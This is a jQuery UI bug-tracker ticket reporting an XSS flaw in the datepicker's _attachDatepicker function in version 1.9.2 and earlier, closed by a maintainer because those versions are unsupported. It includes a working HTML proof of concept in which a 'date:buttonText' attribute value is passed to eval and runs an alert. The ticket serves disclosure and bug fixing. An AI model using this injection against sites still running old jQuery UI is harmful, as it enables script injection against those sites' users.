Opened 4 years ago

Closed 4 years ago

#14731 closed bug (worksforme)

XSS Vulnerability on _attachDatepicker function

Reported by: phatly27 Owned by:
Priority: minor Milestone: none
Component: ui.datepicker Version: 1.9.2
Keywords: Cc:
Blocked by: Blocking:

Description

VULNERABILITY DETAILS A potential bug enables us to inject the XSS content into attribute (with format "date: [PROPERTY_IN_DEFAULTS_DATEPICKER]") in any HTML element using _attachDatepicker function of component ui datepicker. This function used the eval syntax to evaluate the javascript code dynamically.

VERSION Any site using the older versions from version 1.9.2 back to lowest version.

REPRODUCTION CASE

  1. Create a new HTML page.
  2. Inject this content into new page.
<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title></title>
    
    <script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
    <script src="https://code.jquery.com/ui/1.9.2/jquery-ui.min.js"></script>
    <script>
        $(document).ready(function () {
            $.datepicker.setDefaults({
                buttonText: 'abcde'
            });
            $.datepicker._attachDatepicker(document.getElementById("abc"));
            $('#datepicker').datepicker();
        });
    </script>
</head>
<body>
    <div id="abc" date:buttonText="alert('XSS')">
        <input name="datepicker" id="datepicker" type="text"/>
    </div>
</body>
</html>
  1. A alert popup was shown.
  2. Completed.

IN CONCLUSION we expect that the alert popup shouldn't be displayed and eval syntax should be removed instead. If it displays, any attacker can take advantage of injecting the malicious XSS content into website.

Please see details at here http://jsfiddle.net/wanc8t9g/.

Change History (1)

comment:1 Changed 4 years ago by Scott González

Resolution: worksforme
Status: newclosed

None of these versions are supported any more. Any site using such an old version isn't going to be any safer even if we released a new 1.9.x, which we won't. I'm closing as works for me since it has already been fixed for a long time.

Note: See TracTickets for help on using tickets.